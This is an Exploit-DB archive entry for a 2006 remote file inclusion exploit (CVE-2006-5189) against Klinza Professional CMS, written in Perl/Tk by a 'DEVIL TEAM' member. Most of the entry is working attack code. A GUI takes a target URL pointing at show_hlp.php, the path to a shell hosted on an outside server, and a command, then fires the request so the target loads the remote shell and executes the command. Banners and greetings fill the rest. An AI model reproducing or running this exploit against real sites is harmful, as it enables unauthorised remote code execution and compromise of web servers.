Klinza Professional CMS <= 5.0.1 - show_hlp.php File Include Exploit

2006-10-03T00:00:00
ID EDB-ID:2472
Type exploitdb
Reporter Kacper
Modified 2006-10-03T00:00:00

Description

Klinza Professional CMS <= 5.0.1 (show_hlp.php) File Include Exploit. CVE-2006-5189. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl

#:::::::::  :::::::::: :::     ::: ::::::::::: :::        
#:+:    :+: :+:        :+:     :+:     :+:     :+:        
#+:+    +:+ +:+        +:+     +:+     +:+     +:+        
#+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+        
#+#+    +#+ +#+         +#+   +#+      +#+     +#+        
##+#    #+# #+#          #+#+#+#       #+#     #+#        
##########  ##########     ###     ########### ########## 
#::::::::::: ::::::::::     :::     ::::    ::::  
#    :+:     :+:          :+: :+:   +:+:+: :+:+:+ 
#    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+ 
#    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+ 
#    +#+     +#+        +#+     +#+ +#+       +#+ 
#    #+#     #+#        #+#     #+# #+#       #+# 
#    ###     ########## ###     ### ###       ### 
#	
#	
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Klinza Professional CMS &lt;= 5.0.1 (show_hlp.php) Remote File Include Exploit
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- [Script name: Klinza Professional CMS 5.0.1
#- [Script site: http://sourceforge.net/project/showfiles.php?group_id=121246
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-          Find by: Kacper (a.k.a Rahim)
#+
#-    DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
#+
#-          Contact: kacper1964@yahoo.pl
#-                        or
#-           http://www.rahim.webd.pl/
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Special Greetz: DragonHeart ;-)
#- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
#-                 SkD, nukedclx, Ramzes
#-
#- Greetz for all users DEVIL TEAM IRC Channel !!
#!@ Przyjazni nie da sie zamienic na marne korzysci @!
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-            Z Dedykacja dla osoby,
#-         bez ktorej nie mogl bym zyc...
#-           K.C:* J.M (a.k.a Magaja)
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use Tk;
use Tk::DialogBox;
use LWP::UserAgent;


$mw = new MainWindow(title =&gt; "DEVIL TEAM :: Klinza Professional CMS &lt;= 5.0.1 (show_hlp.php) Remote File Include Exploit :: by Kacper ;-)  " );

$mw-&gt;geometry ( '500x300' ) ;
$mw-&gt;resizable(0,0);


$mw-&gt;Label(-text =&gt; 'Klinza Professional CMS &lt;= 5.0.1 (show_hlp.php) Remote File Include Exploit by Kacper', -font =&gt; '{Verdana} 7 bold',-foreground=&gt;'blue')-&gt;pack();
$mw-&gt;Label(-text =&gt; '')-&gt;pack();

$fleft=$mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'ne') ;
$fright=$mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'nw') ;

$url = 'http://www.site.com/[Klinza_path]/funzioni/lib/show_hlp.php?appl[APPL]=';
$shell_path = 'http://server/shell.txt?';
$cmd = 'ls -la';


$fleft-&gt;Label ( -text =&gt; 'Script Path: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$url) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fleft-&gt;Label ( -text =&gt; 'Shell Path: ', -font =&gt; '{Verdana} 8 bold' ) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$shell_path) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fleft-&gt;Label ( -text =&gt; 'CMD: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$cmd) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fright-&gt;Label( -text =&gt; ' ')-&gt;pack();
$fleft-&gt;Label( -text =&gt; ' ')-&gt;pack();



$fright-&gt;Button(-text    =&gt; 'Exploit Include Vulnerability',
                -relief =&gt; "groove",
                -width =&gt; '30',
                -font =&gt; '{Verdana} 8 bold',
                -activeforeground =&gt; 'red',
                -command =&gt; \&akcja
               )-&gt;pack();


$fright-&gt;Label( -text =&gt; ' ')-&gt;pack();
$fright-&gt;Label( -text =&gt; 'Exploit coded by Kacper', -font =&gt; '{Verdana} 7')-&gt;pack();
$fright-&gt;Label( -text =&gt; 'DEVIL TEAM :: The Best Polish Team', -font =&gt; '{Verdana} 7')-&gt;pack();
$fright-&gt;Label( -text =&gt; 'http://www.rahim.webd.pl/', -font =&gt; '{Verdana} 7')-&gt;pack();


MainLoop();


sub akcja()
{

$InfoWindow=$mw-&gt;DialogBox(-title   =&gt; 'DEVIL TEAM :: Exploit by Kacper ;-) ', -buttons =&gt; ["OK"]);
$InfoWindow-&gt;add('Label', -text =&gt; 'Enter to DEVIL TEAM IRC CHANNEL: 72.20.18.6:6667 #devilteam', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; 'DEVIL TEAM SITE: http://www.rahim.webd.pl/', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; 'Greetz For my friends ;-)', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;

system("start $url$shell_path$cmd");
$InfoWindow-&gt;Show();
}

# milw0rm.com [2006-10-03]